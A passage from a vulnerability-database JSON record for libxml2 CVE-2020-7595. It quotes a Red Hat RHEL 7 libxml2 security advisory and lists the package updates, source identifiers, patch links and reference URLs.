CVE-2019-20388 CVE-2020-7595\n====================================================================\n1. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSecurity Fix(es):\n\n* libxml2: memory leak in xmlParseBalancedChunkMemoryRecover in parser.c\n(CVE-2019-19956)\n\n* libxml2: memory leak in xmlSchemaPreRun in xmlschemas.c (CVE-2019-20388)\n\n* libxml2: infinite loop in xmlStringLenDecodeEntities in some end-of-file\nsituations (CVE-2020-7595)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.9 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe desktop must be restarted (log out, then log back in) for this update\nto take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7.5.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7.5.i686.rpm\nlibxml2-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-python-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7.5.i686.rpm\nlibxml2-devel-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-static-2.9.1-6.el7.5.i686.rpm\nlibxml2-static-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7.5.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7.5.i686.rpm\nlibxml2-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-python-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7.5.i686.rpm\nlibxml2-devel-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-static-2.9.1-6.el7.5.i686.rpm\nlibxml2-static-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7.5.src.rpm\n\nppc64:\nlibxml2-2.9.1-6.el7.5.ppc.rpm\nlibxml2-2.9.1-6.el7.5.ppc64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc64.rpm\nlibxml2-devel-2.9.1-6.el7.5.ppc.rpm\nlibxml2-devel-2.9.1-6.el7.5.ppc64.rpm\nlibxml2-python-2.9.1-6.el7.5.ppc64.rpm\n\nppc64le:\nlibxml2-2.9.1-6.el7.5.ppc64le.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc64le.rpm\nlibxml2-devel-2.9.1-6.el7.5.ppc64le.rpm\nlibxml2-python-2.9.1-6.el7.5.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.1-6.el7.5.s390.rpm\nlibxml2-2.9.1-6.el7.5.s390x.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.s390x.rpm\nlibxml2-devel-2.9.1-6.el7.5.s390.rpm\nlibxml2-devel-2.9.1-6.el7.5.s390x.rpm\nlibxml2-python-2.9.1-6.el7.5.s390x.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7.5.i686.rpm\nlibxml2-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7.5.i686.rpm\nlibxml2-devel-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-python-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc64.rpm\nlibxml2-static-2.9.1-6.el7.5.ppc.rpm\nlibxml2-static-2.9.1-6.el7.5.ppc64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.1-6.el7.5.ppc64le.rpm\nlibxml2-static-2.9.1-6.el7.5.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.1-6.el7.5.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.s390x.rpm\nlibxml2-static-2.9.1-6.el7.5.s390.rpm\nlibxml2-static-2.9.1-6.el7.5.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-static-2.9.1-6.el7.5.i686.rpm\nlibxml2-static-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7.5.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7.5.i686.rpm\nlibxml2-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7.5.i686.rpm\nlibxml2-devel-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-python-2.9.1-6.el7.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7.5.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm\nlibxml2-static-2.9.1-6.el7.5.i686.rpm\nlibxml2-static-2.9.1-6.el7.5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-19956\nhttps://access.redhat.com/security/cve/CVE-2019-20388\nhttps://access.redhat.com/security/cve/CVE-2020-7595\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX3OgG9zjgjWX9erEAQg9vhAAiDkPkj6VlpMKDvgVUY4eU83p4bCnZqos\ne9kVjDMJrHdYR5iXXc665LOYBG0yyDGdvVLeqxjI9S11UDypRyzy641kwBY6eCru\n0yaA88aZ4YpQyIARmmK7cIMFe6JRWHOkEsOfMCtjpbkGLteXdzfUFgJnlRFB0Dai\nOVrZH3kGb5EbKvJGcWY7cqv5jQhpy802a4EhpHQ1q6vFAbO7D1T6vJlCyP0+ba5N\nZoMyrCFWaX5TUjiwFkuyAiSZYyPyxo0+dhqgJaSU44BH4p5imV7c1oh10U7/7k+O\nY30M2uLOuArD1ad0t2d23EVr8mRKUr+agoLWC8Pwuq2worTArE/395GKXv2Yvtv9\nYCvvCNFIcnG5GaJloqhXkTZM2pCr0+n90WLrNZ0suPArycHU74ROfBNErWegvq2e\ngpFLyu3S1mpjcBG19Gjg1qgh7FKg57s7PbNzcETK5ParBQeZ4dHHpcr9voP52tYD\nSJ9ILV9unM5jya5Uwooa6GOFGistLQLntZd22zDcPahu0FxvQlyZFV4oInF0m/7h\ne/h8NgSwyJKNenZATlsOGmjdcMh95Unztu4bfK8S20/Ej8F/B2PE4Kxha2s0bxsC\nb9fFKBOIdTCeFi2lTyrctEGQl9ksrW/Va6+uQwe5lKQldwhB3of9QolUu7ud+gdx\nCOt/fBH012Y=udpL\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nSee the documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/\n4.6/html/serverless_applications/index\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1874857 - CVE-2020-24553 golang: default Content-Type setting in net/http/cgi and net/http/fcgi could cause XSS\n1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers\n1897643 - CVE-2020-28366 golang: malicious symbol names can lead to code execution at build time\n1897646 - CVE-2020-28367 golang: improper validation of cgo flags can lead to code execution at build time\n1906381 - Release of OpenShift Serverless Serving 1.12.0\n1906382 - Release of OpenShift Serverless Eventing 1.12.0\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-7595"
},
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159639"
},
{
"db": "PACKETSTORM",
"id": "161016"
},
{
"db": "PACKETSTORM",
"id": "162130"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "161916"
},
{
"db": "PACKETSTORM",
"id": "159851"
},
{
"db": "PACKETSTORM",
"id": "159349"
},
{
"db": "PACKETSTORM",
"id": "160961"
}
],
"trust": 1.98
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-7595",
"trust": 2.8
},
{
"db": "SIEMENS",
"id": "SSA-292794",
"trust": 1.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-103-08",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "159851",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159349",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "161916",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162694",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159639",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.0584",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1207",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3535",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2604",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1744",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0902",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4513",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1242",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1727",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3364",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1564",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2162",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1826",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0234",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3631",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0864",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0471",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0845",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3868",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0986",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3550",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0691",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3248",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4100",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3102",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0319",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1193",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0171",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3072",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0099",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1638",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4058",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158168",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041514",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021091331",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021052216",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072097",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021111735",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2020-04827",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-185720",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-7595",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162142",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161016",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162130",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159553",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160961",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159639"
},
{
"db": "PACKETSTORM",
"id": "161016"
},
{
"db": "PACKETSTORM",
"id": "162130"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "161916"
},
{
"db": "PACKETSTORM",
"id": "159851"
},
{
"db": "PACKETSTORM",
"id": "159349"
},
{
"db": "PACKETSTORM",
"id": "160961"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"id": "VAR-202001-1866",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
}
],
"trust": 0.7003805
},
"last_update_date": "2026-03-09T20:18:55.809000Z",
"patch": {
"_id": null,
"data": [
{
"title": "libxml2 Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=109237"
},
{
"title": "Debian CVElist Bug Report Logs: libxml2: CVE-2020-7595",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=8128495aba3a49b2f3e0b9ee0e8401af"
},
{
"title": "Ubuntu Security Notice: libxml2 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4274-1"
},
{
"title": "Red Hat: Moderate: libxml2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204479 - Security Advisory"
},
{
"title": "Red Hat: Moderate: libxml2 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203996 - Security Advisory"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2020-7595 log"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP3 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202646 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP3 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202644 - Security Advisory"
},
{
"title": "Amazon Linux AMI: ALAS-2020-1438",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2020-1438"
},
{
"title": "Arch Linux Advisories: [ASA-202011-15] libxml2: multiple issues",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-202011-15"
},
{
"title": "Amazon Linux 2: ALAS2-2020-1534",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2020-1534"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=0d160980ab72db34060d62c89304b6f2"
},
{
"title": "Red Hat: Moderate: Release of OpenShift Serverless 1.11.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205149 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.6 runner release (CVE-2019-18874)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204255 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7 runner release (CVE-2019-18874)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204254 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Release of OpenShift Serverless 1.12.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20210146 - Security Advisory"
},
{
"title": "Red Hat: Low: OpenShift Container Platform 4.3.40 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204264 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6 compliance-operator security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20210190 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6 compliance-operator security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20210436 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Quay v3.3.3 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20210050 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=3201548b0e11fd3ecd83fd36fc045a8e"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Container Storage 4.6.0 security, bug fix, enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205605 - Security Advisory"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-835",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.5,
"url": "https://usn.ubuntu.com/4274-1/"
},
{
"trust": 2.4,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-103-08"
},
{
"trust": 2.4,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.9,
"url": "https://security.gentoo.org/glsa/202010-04"
},
{
"trust": 1.8,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-292794.pdf"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200702-0005/"
},
{
"trust": 1.8,
"url": "https://gitlab.gnome.org/gnome/libxml2/commit/0e1a49c89076"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00009.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00047.html"
},
{
"trust": 1.5,
"url": "https://access.redhat.com/security/cve/cve-2020-7595"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/545spoi3zppnpx4tfrive4jvrtjrkull/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5r55zr52rmbx24tqtwhciwkjvrv6yawi/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/jdpf3aavkuakdyfmfksiqsvvs3eefpqh/"
},
{
"trust": 1.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7595"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20388"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2019-20388"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2019-19956"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19956"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5r55zr52rmbx24tqtwhciwkjvrv6yawi/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/545spoi3zppnpx4tfrive4jvrtjrkull/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/jdpf3aavkuakdyfmfksiqsvvs3eefpqh/"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2018-20843"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2019-15903"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6455281"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3535/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0902/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3248/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021052216"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2162/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1727"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1207"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affected-by-libxml2-vulnerabilities-cve-2019-19956-cve-2019-20388-cve-2020-7595/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-4/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0171/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3072"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-bladecenter-advanced-management-module-amm-is-affected-by-vulnerabilities-in-libxml2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4100/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6520474"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0845"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0691"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162694/red-hat-security-advisory-2021-2021-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0099/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4058"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1638/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/libxml2-infinite-loop-via-xmlstringlendecodeentities-31396"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3868/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1744"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072097"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158168/red-hat-security-advisory-2020-2646-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021111735"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0319/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0471/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4513/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-network-security-is-affected-by-multiple-vulnerabilities-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0234/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0584"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-6/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1193"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1564/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-flex-system-chassis-management-module-cmm-is-affected-by-vulnerabilities-in-libxml2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0864"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0986"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-bootable-media-creator-bomc-is-affected-by-vulnerabilities-in-libxml2/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159349/red-hat-security-advisory-2020-3996-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities-6/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021091331"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2604"
},
{
"trust": 0.6,
